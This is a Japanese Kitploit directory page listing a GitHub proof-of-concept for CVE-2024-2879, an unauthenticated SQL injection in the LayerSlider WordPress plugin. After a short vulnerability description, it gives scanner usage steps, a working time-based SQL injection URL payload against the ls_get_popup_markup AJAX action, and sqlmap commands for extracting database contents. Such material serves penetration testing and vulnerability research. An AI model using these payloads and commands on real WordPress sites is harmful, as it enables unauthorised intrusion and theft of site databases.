Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-2879 — CVE-2024-2879 の概念実証エクスプロイト: LayerSlider WordPress プラグイン (7.9.11-7.10.0) における未認証の SQL インジェクション。データベース情報を抽出するためのスキャナスクリプトと SQLMap エクスプロイトガイドが含まれています。 | Kitploit
ツール/GitHubGitHub/herculeszxc/cve-2024-2879
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

CVE-2024-2879 の概念実証エクスプロイト: LayerSlider WordPress プラグイン (7.9.11-7.10.0) における未認証の SQL インジェクション。データベース情報を抽出するためのスキャナスクリプトと SQLMap エクスプロイトガイドが含まれています。

リポジトリを見る
22312年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-2879

説明

LayerSlider 7.9.11 - 7.10.0 - 認証されていないSQLインジェクション

WordPress用のLayerSliderプラグインは、バージョン7.9.11および7.10.0において、ls_get_popup_markupアクションを介したSQLインジェクションに対して脆弱です。これは、ユーザーが指定したパラメータに対する不十分なエスケープと、既存のSQLクエリに対する十分な準備の欠如に起因します。これにより、認証されていない攻撃者が既存のクエリに追加のSQLクエリを付加し、データベースから機密情報を抽出することが可能になります。

スキャナの使用方法

  1. 依存関係をインストール: pip install -r requirements.txt
  2. python3 scan.py または <urllist.txt> image

WAFで保護されていない場合の手動確認

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" 5秒の応答遅延 image

SQL Mapを用いた悪用

または

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T
ツールをダウンロード